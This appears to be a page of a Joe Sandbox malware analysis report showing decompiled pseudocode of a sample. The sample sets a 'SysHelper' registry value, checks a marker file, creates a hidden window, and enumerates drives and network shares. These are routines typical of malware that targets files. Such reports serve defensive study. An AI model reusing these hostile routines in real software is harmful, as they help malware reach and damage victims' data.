					_t268 = _t267 + 4;
					if(_v60 >= 8) {
						L00422587(_v80);
						_t268 = _t268 + 4;
					}
					_v8 = 2;
					_v60 = 7;
					_v64 = 0;
					_v80 = 0;
					if(_v84 >= 8) {
						L00422587(_v104);
						_t268 = _t268 + 4;
					}
					_push(1);
					_v84 = 7;
					_v88 = 0;
					_v104 = 0;
					E00415C10(_t221,  &_v104, _t254, _t259, "\\");
					_v8 = 5;
					_push(1);
					_v60 = 7;
					_v64 = 0;
					_v80 = 0;
					E00415C10(_t221,  &_v80, _t254, _t259, "/");
					_v8 = 6;
					E0040F2B0( &_a4,  &_v80,  &_v104);
					_t269 = _t268 + 4;
					if(_v60 >= 8) {
						L00422587(_v80);
						_t269 = _t269 + 4;
					}
					_v8 = 2;
					_v60 = 7;
					_v64 = 0;
					_v80 = 0;
					if(_v84 >= 8) {
						L00422587(_v104);
						_t269 = _t269 + 4;
					}
					_t260 = _v56;
					_t167 =  >=  ? _t260 :  &_v56;
					_t233 =  >=  ? _t260 :  &_v56;
					_v20 =  >=  ? _t260 :  &_v56;
					_t250 =  >=  ? _t260 :  &_v56;
					_t169 = _t233 + _v40 * 2;
					__eflags = ( >=  ? _t260 :  &_v56) - _t169;
					if(( >=  ? _t260 :  &_v56) != _t169) {
						_push(_t233);
						E00418380( &_v20, _t250, _t169, _v20);
						_t269 = _t269 + 0xc;
					}
					_t261 = _a4;
					_t171 =  >=  ? _t261 :  &_a4;
					_t235 =  >=  ? _t261 :  &_a4;
					_v20 =  >=  ? _t261 :  &_a4;
					_t252 =  >=  ? _t261 :  &_a4;
					_t173 = _t235 + _a20 * 2;
					__eflags = ( >=  ? _t261 :  &_a4) - _t173;
					if(( >=  ? _t261 :  &_a4) != _t173) {
						_push(_t235);
						E00418380( &_v20, _t252, _t173, _v20);
						_t269 = _t269 + 0xc;
					}
					_t267 = _t269 - 8;
					_v20 = 0x5c;
					if(E00414D40( &_v56,  &_v20) != 0xffffffff) {
						_t177 = E00413520( &_v56,  &_v104, 0, _t175);
						_t262 = _t177;
						if( &_v56 != _t177) {
							if(_v36 >= 8) {
								L00422587(_v56);
								_t267 = _t267 + 4;
							}
							_v36 = 7;
							_v40 = 0;
							_v56 = 0;
							E004145A0( &_v56, _t262);
						}
						if(_v84 >= 8) {
							L00422587(_v104);
							_t267 = _t267 + 4;
						}
						_t238 = _v40;
						_t180 =  >=  ? _v56 :  &_v56;
						if( *((short*)(( >=  ? _v56 :  &_v56) + _t238 * 2 - 2)) == 0x5c) {
							_t97 = _t238 - 1; // -1
							_t203 = E00413520( &_v56,  &_v104, 0, _t97);
							_t265 = _t203;
							if( &_v56 != _t203) {
								if(_v36 >= 8) {
									L00422587(_v56);
									_t267 = _t267 + 4;
								}
								_v36 = 7;
								_v40 = 0;
								_v56 = 0;
								E004145A0( &_v56, _t265);
							}
							if(_v84 >= 8) {
								L00422587(_v104);
								_t267 = _t267 + 4;
							}
						}
						_t239 = _a20;
						_t182 =  >=  ? _a4 :  &_a4;
						if( *((short*)(( >=  ? _a4 :  &_a4) + _a20 * 2 - 2)) == 0x5c) {
							_t239 =  &_a4;
							_t195 = E00413520( &_a4,  &_v104, 0,  &_a4 - 1);
							_t264 = _t195;
							if( &_a4 != _t195) {
								if(_a24 >= 8) {
									L00422587(_a4);
									_t267 = _t267 + 4;
								}
								_a24 = 7;
								_t239 =  &_a4;
								_a20 = 0;
								_a4 = 0;
								E004145A0( &_a4, _t264);
							}
							if(_v84 >= 8) {
								L00422587(_v104);
								_t267 = _t267 + 4;
							}
						}
						FreeLibrary(_t221);
						_t185 =  >=  ? _a4 :  &_a4;
						_t222 = _t221 & 0xffffff00 | E00417F00( &_v56, _t239, _v40,  >=  ? _a4 :  &_a4, _a20) == 0x00000000;
					} else {
						FreeLibrary(_t221);
						_t222 = 0;
					}
					if(_v36 >= 8) {
						L00422587(_v56);
						_t267 = _t267 + 4;
					}
					_v36 = 7;
					_v56 = 0;
					_t188 = _v32;
					_v40 = 0;
					if(_v32 != 0) {
						L00422587(_t188);
						_t267 = _t267 + 4;
					}
					goto L41;
				} else {
					_t222 = 0;
					L41:
					if(_a24 >= 8) {
						L00422587(_a4);
					}
					 *[fs:0x0] = _v16;
					return _t222;
				}
			}

APIs

LoadLibraryW.KERNEL32(Shell32.dll,752B3E10), ref: 0040F338
GetProcAddress.KERNEL32(00000000,SHGetFolderPathW,00000001,00000000), ref: 0040F353

Strings

Shell32.dll, xrefs: 0040F32C
\, xrefs: 0040F548
SHGetFolderPathW, xrefs: 0040F34D

Memory Dump Source

Source File: 00000008.00000002.627888842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.628261003.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628304859.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628317747.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: SHGetFolderPathW$Shell32.dll$\
API String ID: 2574300362-2555811374
Opcode ID: 84f5dca6d15e395a5318b2d8ebf354653e1335cc2aeafdcf3ea1fa7091428858
Instruction ID: 879cb2c41796572bb27552663435674e3d239ec9c812fe4031d18dca963833e9
Opcode Fuzzy Hash: 84f5dca6d15e395a5318b2d8ebf354653e1335cc2aeafdcf3ea1fa7091428858
Instruction Fuzzy Hash: DFC15A70D00209EBDF10DFA4DD85BDEBBB5AF14308F10443AE405B7291EB79AA59CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0040C6A0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 49
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040C6A0() {
				void* _v8;
				char _v12;
				int _v16;
				int _v20;
				char _t16;
				long _t21;

				_v8 = 0;
				_t16 = RegOpenKeyExW(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion", 0, 0xf003f,  &_v8); // executed
				if(_t16 != 0) {
					L4:
					return 1;
				} else {
					_v12 = _t16;
					_v20 = 4;
					_v16 = 4;
					_t21 = RegQueryValueExW(_v8, L"SysHelper", 0,  &_v20,  &_v12,  &_v16); // executed
					if(_t21 != 0) {
						_v12 = 1;
						RegSetValueExW(_v8, L"SysHelper", 0, 4,  &_v12, 4); // executed
						RegCloseKey(_v8);
						goto L4;
					} else {
						RegCloseKey(_v8);
						return 0;
					}
				}
			}

0x0040c6a9
0x0040c6c2
0x0040c6ca
0x0040c734
0x0040c739
0x0040c6cc
0x0040c6cc
0x0040c6d6
0x0040c6e1
0x0040c6f3
0x0040c6fb
0x0040c711
0x0040c725
0x0040c72e
0x00000000
0x0040c6fd
0x0040c700
0x0040c70b
0x0040c70b
0x0040c6fb

APIs

RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion,00000000,000F003F,0041E6D4), ref: 0040C6C2
RegQueryValueExW.KERNEL32(00000000,SysHelper,00000000,00000004,?,?), ref: 0040C6F3
RegCloseKey.ADVAPI32(00000000), ref: 0040C700
RegSetValueExW.KERNEL32(00000000,SysHelper,00000000,00000004,?,00000004), ref: 0040C725
RegCloseKey.ADVAPI32(00000000), ref: 0040C72E

Strings

Software\Microsoft\Windows\CurrentVersion, xrefs: 0040C6B8
SysHelper, xrefs: 0040C6EB, 0040C71D

Memory Dump Source

Source File: 00000008.00000002.627888842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.628261003.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628304859.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628317747.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: CloseValue$OpenQuery
String ID: Software\Microsoft\Windows\CurrentVersion$SysHelper
API String ID: 3962714758-1667468722
Opcode ID: 1b3e89e7960631348278952d172054be4d8a3531237e516afd507403cd6f8071
Instruction ID: 83d53c3b81c5c3826f22504a9cab54a14a7287ca0244f3776693af22b4817dfa
Opcode Fuzzy Hash: 1b3e89e7960631348278952d172054be4d8a3531237e516afd507403cd6f8071
Instruction Fuzzy Hash: 60112D7594020CFBDB109F91CC86FEEBB78EB04708F2041A5FA04B22A1D7B55B14AB58

Uniqueness

Uniqueness Score: -1.00%

Function 0040C500 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E0040C500(void* __ecx, void* __edx) {
				char _v264;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				char* _t4;
				void* _t8;
				void* _t10;
				void* _t19;
				void* _t21;
				void* _t22;
				void* _t23;
				void* _t27;

				_t21 = __edx;
				_t4 =  &_v264;
				_t19 = __ecx;
				__imp__SHGetFolderPathA(0, 0x1c, 0, 0, _t4);
				if(_t4 >= 0) {
					PathAppendA( &_v264, "bowsakkdestx.txt");
					_t8 = E004220B6( &_v264, "r"); // executed
					_t27 = _t8;
					__eflags = _t27;
					if(__eflags != 0) {
						_push(_t22);
						_push(2);
						_push(0);
						_push(_t27);
						E0042387F(_t19, _t21, _t22, _t27, __eflags);
						_push(_t27);
						_t10 = E00423455(_t19, _t21, _t22, _t27, __eflags);
						_push(_t27);
						_t23 = _t10;
						E00420CF4(_t19, _t21, _t23, _t27, __eflags);
						__eflags = _t23;
						if(__eflags == 0) {
							L7:
							_push(_t27);
							E00423A38(_t19, _t23, _t27, __eflags);
							__eflags = 0;
							return 0;
						} else {
							__eflags = _t23 - 0x400;
							if(__eflags > 0) {
								goto L7;
							} else {
								E004222F5(_t19, 1, _t23, _t27);
								_push(_t27);
								E00423A38(_t19, _t23, _t27, __eflags);
								return 1;
							}
						}
					} else {
						__eflags = 0;
						return 0;
					}
				} else {
					return 0;
				}
			}

0x0040c500
0x0040c509
0x0040c519
0x0040c51b
0x0040c523
0x0040c539
0x0040c54b
0x0040c550
0x0040c555
0x0040c557
0x0040c561
0x0040c562
0x0040c564
0x0040c566
0x0040c567
0x0040c56c
0x0040c56d
0x0040c572
0x0040c573
0x0040c575
0x0040c57d
0x0040c57f
0x0040c5a5
0x0040c5a5
0x0040c5a6
0x0040c5ae
0x0040c5b6
0x0040c581
0x0040c581
0x0040c587
0x00000000
0x0040c589
0x0040c58e
0x0040c593
0x0040c594
0x0040c5a4
0x0040c5a4
0x0040c587
0x0040c559
0x0040c55a
0x0040c560
0x0040c560
0x0040c525
0x0040c52b
0x0040c52b

APIs

SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?), ref: 0040C51B
PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C539

Strings

bowsakkdestx.txt, xrefs: 0040C52D

Memory Dump Source

Source File: 00000008.00000002.627888842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.628261003.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628304859.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628317747.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: Path$AppendFolder
String ID: bowsakkdestx.txt
API String ID: 29327785-2616962270
Opcode ID: 474c6379b963d257ae86b00d206dade7857df39941341afbbe7ce7c2bd65e929
Instruction ID: a05810460da3035b09b2d6f50620da2975429261b58b3288bff945a9ad0f9da5
Opcode Fuzzy Hash: 474c6379b963d257ae86b00d206dade7857df39941341afbbe7ce7c2bd65e929
Instruction Fuzzy Hash: 281127B2B4023833D930756A7C87FEB735C9B42725F4001B7FE0CA2182A5AE554501E9

Uniqueness

Uniqueness Score: -1.00%

Function 0041BA80 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041BA80(struct HINSTANCE__* __ecx) {
				struct HWND__* _t1;
				struct HWND__* _t6;

				 *0x513244 = __ecx; // executed
				_t1 = CreateWindowExW(0, L"LPCWSTRszWindowClass", L"LPCWSTRszTitle", 0xcf0000, 0x80000000, 0, 0x80000000, 0, 0, 0, __ecx, 0); // executed
				_t6 = _t1;
				if(_t6 != 0) {
					ShowWindow(_t6, 0); // executed
					UpdateWindow(_t6);
					 *0x51323c = _t6;
					return 1;
				} else {
					return _t1;
				}
			}

0x0041baa7
0x0041baad
0x0041bab3
0x0041bab7
0x0041babe
0x0041bac5
0x0041bacb
0x0041bad7
0x0041baba
0x0041baba
0x0041baba

APIs

CreateWindowExW.USER32 ref: 0041BAAD
ShowWindow.USER32(00000000,00000000), ref: 0041BABE
UpdateWindow.USER32 ref: 0041BAC5

Strings

LPCWSTRszWindowClass, xrefs: 0041BAA0
LPCWSTRszTitle, xrefs: 0041BA9B

Memory Dump Source

Source File: 00000008.00000002.627888842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.628261003.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628304859.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628317747.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: Window$CreateShowUpdate
String ID: LPCWSTRszTitle$LPCWSTRszWindowClass
API String ID: 2944774295-3503800400
Opcode ID: a65d1e0183acb99785454671d95aa34da9e61ee796a7d373e4ca79d97c1a5a0d
Instruction ID: 93e3ae8c3ab6e4512016b3ef7200399996c0305a41779b72c5d02abe3f8cd5ff
Opcode Fuzzy Hash: a65d1e0183acb99785454671d95aa34da9e61ee796a7d373e4ca79d97c1a5a0d
Instruction Fuzzy Hash: 08E04F316C172077E3715B15BC5BFDA2918FB05F10F308119FA14792E0C6E569428A8C

Uniqueness

Uniqueness Score: -1.00%

Function 00410BD0 Relevance: 7.7, APIs: 5, Instructions: 234
sharememoryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00410BD0(struct _NETRESOURCE* __ecx, intOrPtr* __edx) {
				char _v8;
				signed int _v16;
				intOrPtr _v24;
				signed int _v28;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				char _v68;
				intOrPtr _v72;
				signed int _v76;
				char _v92;
				intOrPtr _v96;
				int _v100;
				char _v116;
				signed int _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				char _v132;
				signed int _v136;
				signed int _v140;
				void* _v144;
				struct _NETRESOURCE* _v148;
				signed int _v152;
				void* _v156;
				int _v160;
				int _v164;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				int _t83;
				void* _t84;
				signed int _t88;
				signed int _t89;
				signed int _t91;
				intOrPtr _t103;
				void* _t107;
				signed int _t110;
				signed int _t111;
				signed int _t112;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				void* _t122;
				signed int _t124;
				signed int _t127;
				struct _NETRESOURCE* _t129;
				signed int _t131;
				signed int _t135;
				signed int _t136;
				signed int _t139;
				signed int _t140;
				signed int _t141;
				signed int _t142;
				signed int _t143;
				signed int _t144;
				signed int _t145;
				signed int _t146;
				signed int _t147;
				signed int _t148;
				signed int _t151;
				signed int _t152;
				signed int _t153;
				signed int _t154;
				signed int _t161;
				intOrPtr* _t164;
				signed int _t167;
				signed int _t168;
				void* _t169;

				_t129 = __ecx;
				_t168 = _t167 & 0xfffffff8;
				_push(0xffffffff);
				_push(E004CABD6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t168;
				_t169 = _t168 - 0x98;
				_v164 = 0x4000;
				_t164 = __edx;
				_v160 = 0xffffffff;
				_t83 = WNetOpenEnumW(2, 0, 0, __ecx,  &_v156); // executed
				if(_t83 == 0) {
					_t84 = GlobalAlloc(0x40, _v164); // executed
					_t122 = _t84;
					_v144 = _t122;
					while(1) {
						E0042B420(_t122, 0, _v164);
						_t169 = _t169 + 0xc;
						_t88 = WNetEnumResourceW(_v156,  &_v160, _t122,  &_v164); // executed
						__eflags = _t88;
						if(_t88 != 0) {
							break;
						}
						_v148 = _t88;
						__eflags = _v160 - _t88;
						if(_v160 > _t88) {
							_t124 = _t122 + 0x10;
							__eflags = _t124;
							_v152 = _t124;
							do {
								_v96 = 7;
								_v100 = 0;
								_v116 = 0;
								_v72 = 7;
								_v76 = 0;
								_v92 = 0;
								_v48 = 7;
								_v52 = 0;
								_v68 = 0;
								_v24 = 7;
								_v28 = 0;
								_v44 = 0;
								_v8 = 0;
								_t151 =  *_t124;
								_v132 =  *((intOrPtr*)(_t124 - 0x10));
								_v128 =  *((intOrPtr*)(_t124 - 0xc));
								_v124 =  *((intOrPtr*)(_t124 - 8));
								_v120 =  *(_t124 - 4);
								__eflags = _t151;
								if(_t151 != 0) {
									__eflags =  *_t151;
									if( *_t151 != 0) {
										_t146 = _t151;
										_t161 = _t146 + 2;
										do {
											_t118 =  *_t146;
											_t146 = _t146 + 2;
											__eflags = _t118;
										} while (_t118 != 0);
										_t147 = _t146 - _t161;
										__eflags = _t147;
										_t148 = _t147 >> 1;
									} else {
										_t148 = 0;
									}
									_push(_t148);
									_t129 =  &_v116;
									E00415C10(_t124, _t129, _t161, _t164, _t151);
								}
								_t152 =  *(_t124 + 4);
								__eflags = _t152;
								if(_t152 != 0) {
									__eflags =  *_t152;
									if( *_t152 != 0) {
										_t143 = _t152;
										_t38 = _t143 + 2; // 0x3
										_t161 = _t38;
										do {
											_t116 =  *_t143;
											_t143 = _t143 + 2;
											__eflags = _t116;
										} while (_t116 != 0);
										_t144 = _t143 - _t161;
										__eflags = _t144;
										_t145 = _t144 >> 1;
									} else {
										_t145 = 0;
									}
									_push(_t145);
									_t129 =  &_v92;
									E00415C10(_t124, _t129, _t161, _t164, _t152);
								}
								_t153 =  *(_t124 + 8);
								__eflags = _t153;
								if(_t153 != 0) {
									__eflags =  *_t153;
									if( *_t153 != 0) {
										_t140 = _t153;
										_t161 = _t140 + 2;
										do {
											_t114 =  *_t140;
											_t140 = _t140 + 2;
											__eflags = _t114;
										} while (_t114 != 0);
										_t141 = _t140 - _t161;
										__eflags = _t141;
										_t142 = _t141 >> 1;
									} else {
										_t142 = 0;
									}
									_push(_t142);
									_t129 =  &_v68;
									E00415C10(_t124, _t129, _t161, _t164, _t153);
								}
								_t154 =  *(_t124 + 0xc);
								__eflags = _t154;
								if(_t154 != 0) {
									__eflags =  *_t154;
									if( *_t154 != 0) {
										_t110 = _t154;
										_t44 = _t110 + 2; // 0x72
										_t161 = _t44;
										do {
											_t139 =  *_t110;
											_t110 = _t110 + 2;
											__eflags = _t139;
										} while (_t139 != 0);
										_t111 = _t110 - _t161;
										__eflags = _t111;
										_t112 = _t111 >> 1;
									} else {
										_t112 = 0;
									}
									_push(_t112);
									_t129 =  &_v44;
									E00415C10(_t124, _t129, _t161, _t164, _t154);
								}
								_t161 =  *(_t164 + 4);
								__eflags =  &_v132 - _t161;
								if( &_v132 >= _t161) {
									L41:
									__eflags = _t161 -  *((intOrPtr*)(_t164 + 8));
									if(_t161 ==  *((intOrPtr*)(_t164 + 8))) {
										_push(_t129);
										E004150C0(_t124, _t164, _t161, _t164);
									}
									_t131 =  *(_t164 + 4);
									_v140 = _t131;
									_v136 = _t131;
									_v8 = 2;
									__eflags = _t131;
									if(__eflags != 0) {
										E00418FD0(_t131, __eflags,  &_v132);
									}
								} else {
									_t103 =  *_t164;
									_t129 =  &_v132;
									__eflags = _t103 - _t129;
									if(_t103 > _t129) {
										goto L41;
									} else {
										_t135 = _t129 - _t103;
										_t127 = ((0x92492493 * _t135 >> 0x20) + _t135 >> 6 >> 0x1f) + ((0x92492493 * _t135 >> 0x20) + _t135 >> 6);
										__eflags = _t161 -  *((intOrPtr*)(_t164 + 8));
										if(_t161 ==  *((intOrPtr*)(_t164 + 8))) {
											_push(_t135);
											E004150C0(_t127, _t164, _t161, _t164);
										}
										_t136 =  *(_t164 + 4);
										_v136 = _t136;
										_v140 = _t136;
										_t107 = _t127 * 0x70 +  *_t164;
										_v8 = 1;
										__eflags = _t136;
										if(__eflags != 0) {
											E00418FD0(_t136, __eflags, _t107);
										}
										_t124 = _v152;
									}
								}
								_v8 = 0;
								 *(_t164 + 4) =  *(_t164 + 4) + 0x70;
								__eflags =  *(_t124 - 4) & 0x00000002;
								if(( *(_t124 - 4) & 0x00000002) != 0) {
									_t71 = _t124 - 0x10; // -16, executed
									E00410BD0(_t71, _t164); // executed
								}
								_v8 = 0xffffffff;
								E00410F20( &_v132);
								_t124 = _t124 + 0x20;
								_t129 = _v148 + 1;
								_v152 = _t124;
								_v148 = _t129;
								__eflags = _t129 - _v160;
							} while (_t129 < _v160);
							_t122 = _v144;
						}
					}
					_t89 = WNetCloseEnum(_v156);
					asm("sbb eax, eax");
					 *[fs:0x0] = _v16;
					_t91 =  ~_t89 + 1;
					__eflags = _t91;
					return _t91;
				} else {
					 *[fs:0x0] = _v16;
					return 0;
				}
			}

0x00410bd0
0x00410bd3
0x00410bd6
0x00410bd8
0x00410be3
0x00410be4
0x00410beb
0x00410bf8
0x00410c08
0x00410c0a
0x00410c12
0x00410c1a
0x00410c39
0x00410c3f
0x00410c41
0x00410c45
0x00410c4c
0x00410c51
0x00410c63
0x00410c69
0x00410c6b
0x00000000
0x00000000
0x00410c71
0x00410c75
0x00410c79
0x00410c7b
0x00410c7b
0x00410c7e
0x00410c82
0x00410c84
0x00410c8c
0x00410c94
0x00410c99
0x00410ca1
0x00410ca5
0x00410caa
0x00410cb5
0x00410cbc
0x00410cc1
0x00410ccc
0x00410cd3
0x00410cdb
0x00410ce5
0x00410ce7
0x00410cee
0x00410cf5
0x00410cfc
0x00410d00
0x00410d02
0x00410d04
0x00410d08
0x00410d0e
0x00410d10
0x00410d13
0x00410d13
0x00410d16
0x00410d19
0x00410d19
0x00410d1e
0x00410d1e
0x00410d20
0x00410d0a
0x00410d0a
0x00410d0a
0x00410d22
0x00410d24
0x00410d28
0x00410d28
0x00410d2d
0x00410d30
0x00410d32
0x00410d34
0x00410d38
0x00410d3e
0x00410d40
0x00410d40
0x00410d43
0x00410d43
0x00410d46
0x00410d49
0x00410d49
0x00410d4e
0x00410d4e
0x00410d50
0x00410d3a
0x00410d3a
0x00410d3a
0x00410d52
0x00410d54
0x00410d58
0x00410d58
0x00410d5d
0x00410d60
0x00410d62
0x00410d64
0x00410d68
0x00410d6e
0x00410d70
0x00410d73
0x00410d73
0x00410d76
0x00410d79
0x00410d79
0x00410d7e
0x00410d7e
0x00410d80
0x00410d6a
0x00410d6a
0x00410d6a
0x00410d82
0x00410d84
0x00410d88
0x00410d88
0x00410d8d
0x00410d90
0x00410d92
0x00410d94
0x00410d98
0x00410d9e
0x00410da0
0x00410da0
0x00410da3
0x00410da3
0x00410da6
0x00410da9
0x00410da9
0x00410dae
0x00410dae
0x00410db0
0x00410d9a
0x00410d9a
0x00410d9a
0x00410db2
0x00410db4
0x00410dbb
0x00410dbb
0x00410dc0
0x00410dc7
0x00410dc9
0x00410e1f
0x00410e1f
0x00410e22
0x00410e24
0x00410e27
0x00410e27
0x00410e2c
0x00410e2f
0x00410e33
0x00410e37
0x00410e3f
0x00410e41
0x00410e48
0x00410e48
0x00410dcb
0x00410dcb
0x00410dcd
0x00410dd1
0x00410dd3
0x00000000
0x00410dd5
0x00410dd5
0x00410de8
0x00410dea
0x00410ded
0x00410def
0x00410df2
0x00410df2
0x00410df7
0x00410dfd
0x00410e01
0x00410e05
0x00410e07
0x00410e0f
0x00410e11
0x00410e14
0x00410e14
0x00410e19
0x00410e19
0x00410dd3
0x00410e4d
0x00410e55
0x00410e59
0x00410e60
0x00410e64
0x00410e67
0x00410e67
0x00410e70
0x00410e7b
0x00410e84
0x00410e87
0x00410e88
0x00410e8c
0x00410e90
0x00410e90
0x00410e9a
0x00410e9a
0x00410c79
0x00410ea7
0x00410eb7
0x00410eb9
0x00410ec1
0x00410ec1
0x00410ec6
0x00410c1c
0x00410c25
0x00410c32
0x00410c32

APIs

WNetOpenEnumW.MPR(00000002,00000000,00000000,00000000,?), ref: 00410C12
GlobalAlloc.KERNEL32(00000040,00004000), ref: 00410C39
_memset.LIBCMT ref: 00410C4C
WNetEnumResourceW.MPR(?,?,00000000,?), ref: 00410C63

Memory Dump Source

Source File: 00000008.00000002.627888842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.628261003.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628304859.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628317747.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: Enum$AllocGlobalOpenResource_memset
String ID:
API String ID: 364255426-0
Opcode ID: 54b312cc4ee8bd09624119d4c268e334e055f93c635bfd49589b22278edf9028
Instruction ID: bd97fe2cb621df6ca28f66a093f1f6e361520364a30ff1ea4190286e2c40543e
Opcode Fuzzy Hash: 54b312cc4ee8bd09624119d4c268e334e055f93c635bfd49589b22278edf9028
Instruction Fuzzy Hash: 0F91B2756083418FD724DF55D891BABB7E1FF84704F14891EE48A87380E7B8A981CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 00410A50 Relevance: 7.6, APIs: 5, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00410A50(char __ecx) {
				signed int _v16;
				char _v28;
				intOrPtr _v48;
				char _v52;
				intOrPtr _v56;
				void* _v60;
				char _v64;
				char _v68;
				char _v76;
				unsigned int _v80;
				char _v84;
				unsigned int _v88;
				char _v89;
				intOrPtr _v96;
				intOrPtr _v101;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t35;
				int _t39;
				int _t40;
				int _t45;
				void* _t48;
				signed int _t52;
				char* _t63;
				signed int _t74;
				signed int _t75;
				void* _t76;
				char* _t77;

				_t75 = _t74 & 0xfffffff8;
				_push(0xffffffff);
				_push(E004CAB90);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t75;
				_t76 = _t75 - 0x48;
				_push(_t72);
				_push(_t70);
				_v76 = __ecx;
				_t35 = GetLogicalDrives(); // executed
				_v80 = _t35;
				_t52 = 0;
				do {
					if((_t35 >> _t52 & 0x00000001) == 0) {
						goto L11;
					}
					_push(1);
					_v48 = 0xf;
					_v52 = 0;
					_v68 = 0;
					E004156D0(_t52,  &_v68, _t70, " ");
					_v16 = 0;
					_t10 = _t52 + 0x41; // 0x41
					_push(2);
					_t59 =  >=  ? _v76 :  &_v76;
					 *( >=  ? _v76 :  &_v76) = _t10;
					E00413EA0(_t52,  &_v76, _t70, _t72, ":\\");
					_t39 = SetErrorMode(1); // executed
					_t70 = _t39;
					_t62 =  >=  ? _v84 :  &_v84;
					_t40 = PathFileExistsA( >=  ? _v84 :  &_v84); // executed
					_t72 = _t40; // executed
					SetErrorMode(_t39); // executed
					if(_t40 != 0) {
						_t44 =  >=  ? _v76 :  &_v76;
						_t45 = GetDriveTypeA( >=  ? _v76 :  &_v76); // executed
						if(_t45 >= 2 && (_t45 <= 4 || _t45 == 6)) {
							_t77 = _t76 - 0x18;
							_v89 = 0;
							_t63 = _t77;
							_push(0xffffffff);
							 *((intOrPtr*)(_t63 + 0x14)) = 0xf;
							 *((intOrPtr*)(_t63 + 0x10)) = 0;
							 *_t63 = 0;
							E00413FF0(_t52, _t63,  &_v76, 0);
							_t48 = E00412900( &_v64, _v101);
							_t76 = _t77 + 0x18;
							_v28 = 1;
							E00413580(_t52, _v96, _t48);
							if(_v48 >= 8) {
								L00422587(_v56);
								_t76 = _t76 + 4;
							}
						}
					}
					_v16 = 0xffffffff;
					if(_v56 >= 0x10) {
						L00422587(_v76);
						_t76 = _t76 + 4;
					}
					_t35 = _v88;
					L11:
					_t52 = _t52 + 1;
				} while (_t52 < 0x1a);
				 *[fs:0x0] = _v16;
				return _t35;
			}

APIs

GetLogicalDrives.KERNEL32 ref: 00410A75
SetErrorMode.KERNEL32(00000001,00500234,00000002), ref: 00410AE2
PathFileExistsA.SHLWAPI(?), ref: 00410AF9
SetErrorMode.KERNEL32(00000000), ref: 00410B02
GetDriveTypeA.KERNEL32(?), ref: 00410B1B

Memory Dump Source

Source File: 00000008.00000002.627888842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.628261003.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628304859.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628317747.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: ErrorMode$DriveDrivesExistsFileLogicalPathType
String ID:
API String ID: 2560635915-0
Opcode ID: 7e3546227060cc9c05aa29c6dd030ea43cb70f558f56a0c6a560f6836b52baa2
Instruction ID: e48b338c548d72163c5ae3f73f283317dfaad29deff82c686574d6b9df2ed0f8
